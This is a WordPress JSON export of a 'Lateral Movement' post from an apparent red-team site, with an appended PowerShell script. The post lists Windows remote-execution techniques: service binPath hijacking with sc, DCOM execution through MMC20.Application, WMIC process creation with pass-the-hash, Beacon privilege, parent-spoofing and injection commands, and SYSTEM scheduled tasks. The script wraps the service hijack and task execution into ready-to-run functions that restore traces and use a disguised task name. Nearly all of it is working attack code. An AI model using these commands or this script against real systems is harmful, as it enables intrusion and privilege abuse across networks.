{"id":159,"date":"2021-11-12T17:16:36","date_gmt":"2021-11-12T17:16:36","guid":{"rendered":"https:\/\/www.davincivirus.com\/?p=159"},"modified":"2021-11-12T17:16:36","modified_gmt":"2021-11-12T17:16:36","slug":"lateral-movement","status":"publish","type":"post","link":"https:\/\/www.davincivirus.com\/?p=159","title":{"rendered":"Lateral Movement"},"content":{"rendered":"\n<p><strong>Service Manipulation<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><em>(VSS, the Volume Shadow Copy service, is a common choice: it exists on every Windows host, runs as LocalSystem, is set to Manual start and is normally stopped. Record the BINARY_PATH_NAME printed by the first qc; that is the value restored at the end. The service must be stopped before start is issued, and from PowerShell call sc.exe by its full name, because sc is an alias for Set-Content)\n<\/em>sc \\\\&lt;REMOTE_IP> query &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> qc &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> qfailure &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> config &lt;SERVICENAME> binpath= \"&lt;PAYLOAD LOC>\"\n<em>(when the payload is not a real service binary, start reports error 1053 after the SCM timeout; the payload has still been executed under the service account)\n<\/em>sc \\\\&lt;REMOTE_IP> start &lt;SERVICENAME>\nsc \\\\&lt;REMOTE_IP> config &lt;SERVICENAME> binpath= \"&lt;ORIGINAL FILE LOC>\"\nsc \\\\&lt;REMOTE_IP> qc &lt;SERVICENAME><\/code><\/pre>\n\n\n\n<p><strong>COM Object<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><em>(DCOM execution through the MMC20.Application object; needs local admin on the target and DCOM reachable, TCP 135 plus the dynamic RPC ports. ExecuteShellCommand takes command, working directory, parameters and window state; 7 runs the command minimized)\n<\/em>([activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"&lt;IPToTarget>\"))).Document.ActiveView.ExecuteShellCommand(\"&lt;CommandToExec>\",$null,$null,\"7\")<\/code><\/pre>\n\n\n\n<p><strong>WMIC<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>WMIC \/NODE:\"&lt;IP OR HOSTNAME>\" \/USER:\"&lt;DOMAIN\\\\USERNAME>\" \/PASSWORD:\"&lt;CLEARTEXT_PW>\" PROCESS CALL CREATE \"&lt;PAYLOAD_FILE_LOC>\"\n<em>    -or, with pass-the-hash: omit \/USER and \/PASSWORD so the current logon session's credentials are used-\n<\/em>WMIC \/NODE:\"&lt;IP OR HOSTNAME>\" PROCESS CALL CREATE \"&lt;PAYLOAD_FILE_LOC>\"\n\n<em>(Beacon console commands for the new session once the WMIC-spawned payload checks in: enable SeDebugPrivilege, spoof the parent to a SYSTEM process, spawn a sacrificial process and migrate into it; take the new PID from ps)\n<\/em>    getprivs\n    ppid &lt;random SYSTEM process PID>\n    execute c:\\\\windows\\\\system32\\\\upnpcont.exe\n    inject &lt;new process ID> x64<\/code><\/pre>\n\n\n\n<p><strong>SCHTASKS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><em>(IF PRIVILEGED - the \/RU SYSTEM and \/SC ONLOGON options are available. Give \/S on every call, the delete included, or schtasks acts on the local host)\n<\/em>schtasks.exe \/Create \/S &lt;IP or HOSTNAME> \/F \/RU SYSTEM \/SC ONLOGON \/TN \"&lt;TASKNAME>\" \/TR \"&lt;PAYLOAD_FILEPATH>\"\nschtasks.exe \/Run \/S &lt;IP or HOSTNAME> \/TN \"&lt;TASKNAME>\"\nschtasks.exe \/Delete \/S &lt;IP or HOSTNAME> \/F \/TN \"&lt;TASKNAME>\"<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Service Manipulation COM Object WMIC SCHTASKS<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159"}],"collection":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=159"}],"version-history":[{"count":1,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159\/revisions"}],"predecessor-version":[{"id":160,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=\/wp\/v2\/posts\/159\/revisions\/160"}],"wp:attachment":[{"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=159"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.davincivirus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
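The Service Manipulation and SCHTASKS sequences from the post, as an added PowerShell example that is not code from the original page. It wraps the same sc.exe and schtasks.exe calls so that the original binPath is read from qc before it is overwritten and put back in a finally block, the expected error 1053 from sc start is told apart from a real failure, and /S is passed on every schtasks call. It assumes an elevated PowerShell session running as a local admin on the target; the host 10.10.10.5, the path C:\Windows\Temp\payload.exe and the task name WinUpdateCheck are placeholders, not values from the post.

```powershell
# Added example, not code from the original post: the sc.exe service-hijack
# and schtasks sequences from the cheat sheet, wrapped so the original binPath
# is captured before it is overwritten and put back afterwards, and so the
# expected error 1053 from "sc start" is distinguished from a real failure.
# Assumptions: run from an elevated PowerShell as a local admin on $Target,
# $PayloadPath is a path valid on the target, and 'WinUpdateCheck' is a
# placeholder task name. sc.exe is called by its full name because plain
# "sc" is the PowerShell alias for Set-Content.

function Get-RemoteServiceBinPath {
    param([string]$Target, [string]$ServiceName)
    $qc = sc.exe "\\$Target" qc $ServiceName
    if ($LASTEXITCODE -ne 0) { throw "sc qc failed for $ServiceName on $Target (code $LASTEXITCODE)" }
    # qc prints a line such as "        BINARY_PATH_NAME   : C:\Windows\system32\vssvc.exe"
    foreach ($line in $qc) {
        if ($line -match 'BINARY_PATH_NAME\s*:\s*(.+)$') { return $Matches[1].Trim() }
    }
    throw "BINARY_PATH_NAME not found in qc output for $ServiceName"
}

function Invoke-ServiceHijack {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$PayloadPath,
        [string]$ServiceName = 'VSS'   # present, LocalSystem, and normally stopped
    )
    $original = Get-RemoteServiceBinPath -Target $Target -ServiceName $ServiceName
    Write-Host "[*] $ServiceName binPath on $Target is: $original"

    # "sc start" fails with 1056 if the service is already running, so check first.
    $state = (sc.exe "\\$Target" query $ServiceName | Where-Object { $_ -match '\sSTATE\s*:' }) -join ' '
    if ($state -notmatch 'STOPPED') { throw "$ServiceName on $Target is not stopped: $state" }

    try {
        # Note the syntax: "binpath=" then a space, then the value as the next argument.
        sc.exe "\\$Target" config $ServiceName binpath= "$PayloadPath" | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "config (set payload) failed (code $LASTEXITCODE)" }

        $out = sc.exe "\\$Target" start $ServiceName
        # sc.exe exits with the Win32 error code. A payload that is not a real
        # service binary never answers the SCM, so start reports 1053 after the
        # SCM timeout even though the payload has already been executed.
        switch ($LASTEXITCODE) {
            0       { Write-Host "[+] $ServiceName started" }
            1053    { Write-Host "[+] start returned 1053 (expected for a non-service payload); payload ran" }
            default { throw "start failed (code $LASTEXITCODE): $($out -join ' ')" }
        }
    } finally {
        # Always restore the original path and verify the restore, even if start threw.
        sc.exe "\\$Target" config $ServiceName binpath= "$original" | Out-Null
        $restored = Get-RemoteServiceBinPath -Target $Target -ServiceName $ServiceName
        if ($restored -ne $original) { Write-Warning "restore failed: binPath is now '$restored'" }
        else { Write-Host "[*] binPath restored to: $original" }
    }
}

function Invoke-ScheduledTaskExec {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$PayloadPath,
        [string]$TaskName = 'WinUpdateCheck'   # placeholder task name
    )
    # /S on every call: without it schtasks acts on the local host, which is
    # how a "delete" ends up leaving the task behind on the target.
    schtasks.exe /Create /S $Target /F /RU SYSTEM /SC ONLOGON /TN $TaskName /TR $PayloadPath | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "task create failed on $Target (code $LASTEXITCODE)" }
    try {
        schtasks.exe /Run /S $Target /TN $TaskName | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "task run failed on $Target (code $LASTEXITCODE)" }
        Write-Host "[+] task $TaskName started on $Target"
    } finally {
        schtasks.exe /Delete /S $Target /F /TN $TaskName | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "task $TaskName was not deleted on $Target" }
    }
}

# Usage (placeholder host and path):
#   Invoke-ServiceHijack     -Target 10.10.10.5 -PayloadPath 'C:\Windows\Temp\payload.exe'
#   Invoke-ScheduledTaskExec -Target 10.10.10.5 -PayloadPath 'C:\Windows\Temp\payload.exe'
```

The restore step is not optional: sc config writes the new binPath to the service's registry key, so a missed restore leaves the target with a broken VSS service and a copy of the payload path for anyone who later runs qc. The 1053 branch is the normal outcome for a plain executable payload; only a binary that calls StartServiceCtrlDispatcher will make start return 0.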